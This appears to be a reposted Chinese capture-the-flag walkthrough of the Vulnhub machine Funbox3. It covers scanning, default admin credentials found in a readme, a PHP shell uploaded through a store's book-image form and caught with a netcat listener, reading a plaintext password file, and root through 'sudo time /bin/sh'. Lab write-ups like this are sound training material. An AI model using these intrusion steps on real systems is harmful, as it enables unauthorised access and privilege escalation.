Funbox3

识别目标主机IP地址

┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                         
 192.168.56.100  08:00:27:86:52:7b      1      60  PCS Systemtechnik GmbH                                                                                                                                                                 
 192.168.56.162  08:00:27:41:c1:af      1      60  PCS Systemtechnik GmbH       

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.162

NMAP 扫描

┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 02:15 EST
Nmap scan report for bogon (192.168.56.162)
Host is up (0.00033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b2:d8:51:6e:c5:84:05:19:08:eb:c8:58:27:13:13:2f (RSA)
|   256 b0:de:97:03:a7:2f:f4:e2:ab:4a:9c:d9:43:9b:8a:48 (ECDSA)
|_  256 9d:0f:9a:26:38:4f:01:80:a7:a6:80:9d:d1:d4:cf:ec (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_gym
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=11/8%Time=636A0202%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:41:C1:AF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.61 seconds
                                                                                

Get Access

在Kali Linux利用浏览器访问80端口,返回apache默认页面。

┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/robots.txt
Disallow: gym

┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ gobuster dir -u http://192.168.56.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                                        
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.162
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/08 02:20:31 Starting gobuster in directory enumeration mode
===============================================================
/store                (Status: 301) [Size: 316] [--> http://192.168.56.162/store/]
/admin                (Status: 301) [Size: 316] [--> http://192.168.56.162/admin/]
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.162/secret/]
/gym                  (Status: 301) [Size: 314] [--> http://192.168.56.162/gym/]
/server-status        (Status: 403) [Size: 279]
Progress: 219643 / 220561 (99.58%)===============================================================
2022/11/08 02:21:04 Finished
===============================================================
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ gobuster dir -u http://192.168.56.162/gym -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.162/gym
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/08 02:21:49 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 318] [--> http://192.168.56.162/gym/img/]
/profile              (Status: 301) [Size: 322] [--> http://192.168.56.162/gym/profile/]
/admin                (Status: 301) [Size: 320] [--> http://192.168.56.162/gym/admin/]
/upload               (Status: 301) [Size: 321] [--> http://192.168.56.162/gym/upload/]
/include              (Status: 301) [Size: 322] [--> http://192.168.56.162/gym/include/]
/LICENSE              (Status: 200) [Size: 18025]
/att                  (Status: 301) [Size: 318] [--> http://192.168.56.162/gym/att/]
/ex                   (Status: 301) [Size: 317] [--> http://192.168.56.162/gym/ex/]
/boot                 (Status: 301) [Size: 319] [--> http://192.168.56.162/gym/boot/]
Progress: 219077 / 220561 (99.33%)===============================================================
2022/11/08 02:22:20 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ dirb http://192.168.56.162

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Nov  8 02:28:34 2022
URL_BASE: http://192.168.56.162/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.162/ ----
==> DIRECTORY: http://192.168.56.162/admin/                                                                                                                                                                                               
+ http://192.168.56.162/index.html (CODE:200|SIZE:10918)                                                                                                                                                                                  
+ http://192.168.56.162/index.php (CODE:200|SIZE:3468)                                                                                                                                                                                    
+ http://192.168.56.162/robots.txt (CODE:200|SIZE:14)                                                                                                                                                                                     
==> DIRECTORY: http://192.168.56.162/secret/                                                                                                                                                                                              
+ http://192.168.56.162/server-status (CODE:403|SIZE:279)                                                                                                                                                                                 
==> DIRECTORY: http://192.168.56.162/store/                                                                                                                                                                                               
                                                                                                                                                                                                                                          
---- Entering directory: http://192.168.56.162/admin/ ----
==> DIRECTORY: http://192.168.56.162/admin/assets/                                                                                                                                                                                        
+ http://192.168.56.162/admin/index.php (CODE:200|SIZE:3263)                                                                                                                                                                              
                                                                                                                                                                                                                                          
---- Entering directory: http://192.168.56.162/secret/ ----
+ http://192.168.56.162/secret/index.php (CODE:200|SIZE:108)                                                                                                                                                                              
+ http://192.168.56.162/secret/robots.txt (CODE:200|SIZE:35)                                                                                                                                                                              
                                                                                                                                                                                                                                          
---- Entering directory: http://192.168.56.162/store/ ----
+ http://192.168.56.162/store/admin.php (CODE:200|SIZE:3153)                                                                                                                                                                              
==> DIRECTORY: http://192.168.56.162/store/controllers/                                                                                                                                                                                   
==> DIRECTORY: http://192.168.56.162/store/database/                                                                                                                                                                                      
==> DIRECTORY: http://192.168.56.162/store/functions/                                                                                                                                                                                     
+ http://192.168.56.162/store/index.php (CODE:200|SIZE:3998)                                                                                                                                                                              
==> DIRECTORY: http://192.168.56.162/store/models/                                                                                                                                                                                        
==> DIRECTORY: http://192.168.56.162/store/template/                                                                                                                                                                                      
                                                                                                                                                                                                                                          
---- Entering directory: http://192.168.56.162/admin/assets/ ----

                                                                               
-----------------
END_TIME: Tue Nov  8 02:28:41 2022
DOWNLOADED: 18448 - FOUND: 9
                                                           

扫描出了非常多的目录,其中/store/database中有用户名和密码。

┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/store/database/readme.txt.txt                  
This is an simple online web store was made by using php , mysql and bootstrap. 

the sql for database is put in folder sql. 
the database contains many tables. 

To change the localhost, username, password for connecting to database, change it only one time in 
www_project/functions/database_functions.php -> db_connect() . Simple and fast
The base is localhost , root , , www_project 

to connect the admin section, click the name Nghi Le Thanh at the bottom. 
the name and pass for log in is admin , admin. Just to make it simple. 

the 2 main things are not fully implemented is contact and process purchase. 
Due to having to work with some security and online payment, the process site is just a place holder. 

for futher questions, please let me know. my email: nghi.lethanh2@cou.fi       

利用这里找到的用户名和密码: admin admin登录 /store/admin

成功登录,点击add new book

Can’t add new data Incorrect integer value: ” for column ‘publisherid’ at row 1

这里需要注意publisher,可以拷贝现有的Publisher

然后可以成功上传shell.php

那么这个shell.php存在什么地方呢,可以找任何一本书,然后定位书的图片的位置,所在目录中可以看到shell.php

http://192.168.56.162/store/bootstrap/img/

成功拿到了shell

└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.162] 42364
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 07:39:53 up 30 min,  0 users,  load average: 0.00, 0.04, 0.17
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

cd /home
www-data@funbox3:/home$ ls -lah
ls -lah
total 12K
drwxr-xr-x  3 root root 4.0K Jul 30  2020 .
drwxr-xr-x 20 root root 4.0K Jul 30  2020 ..
drwxr-xr-x  3 tony tony 4.0K Jul 31  2020 tony
www-data@funbox3:/home$ cd tony
cd tony
www-data@funbox3:/home/tony$ ls -alh
ls -alh
total 36K
drwxr-xr-x 3 tony tony 4.0K Jul 31  2020 .
drwxr-xr-x 3 root root 4.0K Jul 30  2020 ..
-rw------- 1 tony tony   30 Jul 31  2020 .bash_history
-rw-r--r-- 1 tony tony  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 tony tony 3.7K Feb 25  2020 .bashrc
drwx------ 2 tony tony 4.0K Jul 30  2020 .cache
-rw-r--r-- 1 tony tony  807 Feb 25  2020 .profile
-rw-r--r-- 1 tony tony    0 Jul 30  2020 .sudo_as_admin_successful
-rw------- 1 tony tony 1.6K Jul 31  2020 .viminfo
-rw-rw-r-- 1 tony tony   70 Jul 31  2020 password.txt
www-data@funbox3:/home/tony$ cat passwod.txt
cat passwod.txt
cat: passwod.txt: No such file or directory
www-data@funbox3:/home/tony$ cat password.txt
cat password.txt
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin
www-data@funbox3:/home/tony$ su - tony
su - tony
Password: yxcvbnmYYY

tony@funbox3:~$ id
id
uid=1000(tony) gid=1000(tony) groups=1000(tony),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
tony@funbox3:~$ sudo -l
sudo -l
Matching Defaults entries for tony on funbox3:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tony may run the following commands on funbox3:
    (root) NOPASSWD: /usr/bin/yelp
    (root) NOPASSWD: /usr/bin/dmf
    (root) NOPASSWD: /usr/bin/whois
    (root) NOPASSWD: /usr/bin/rlogin
    (root) NOPASSWD: /usr/bin/pkexec
    (root) NOPASSWD: /usr/bin/mtr
    (root) NOPASSWD: /usr/bin/finger
    (root) NOPASSWD: /usr/bin/time
    (root) NOPASSWD: /usr/bin/cancel
    (root) NOPASSWD:
        /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
tony@funbox3:~$ 

有很明显的提示,tony的密码,这样就可以切换到用户tony

提权

tony@funbox3:~$ ls /root/root.txt
ls /root/root.txt
ls: cannot access '/root/root.txt': Permission denied
tony@funbox3:~$ sudo /usr/bin/time /bin/sh
sudo /usr/bin/time /bin/sh
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
root.flag  snap
# cat root.flag
cat root.flag
 __________          ___.                      ___________                     
\_   _____/_ __  ____\_ |__   _______  ___ /\  \_   _____/____    _________.__.
 |    __)|  |  \/    \| __ \ /  _ \  \/  / \/   |    __)_\__  \  /  ___<   |  |
 |     \ |  |  /   |  \ \_\ (  <_> >    <  /\   |        \/ __ \_\___ \ \___  |
 \___  / |____/|___|  /___  /\____/__/\_ \ \/  /_______  (____  /____  >/ ____|
     \/             \/    \/            \/             \/     \/     \/ \/     
                                                                        
Made with ❤ from twitter@0815R2d2. Please, share this on twitter if you want.
# 

提权很简单,参考GTFOBINS网站,最后选择time命令进行提权

成功拿到了root flag!!!

原文地址:http://www.cnblogs.com/jason-huawen/p/16870006.html

1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长! 2. 分享目的仅供大家学习和交流,请务用于商业用途! 3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入! 4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解! 5. 如有链接无法下载、失效或广告,请联系管理员处理! 6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需! 7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员! 8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载 声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性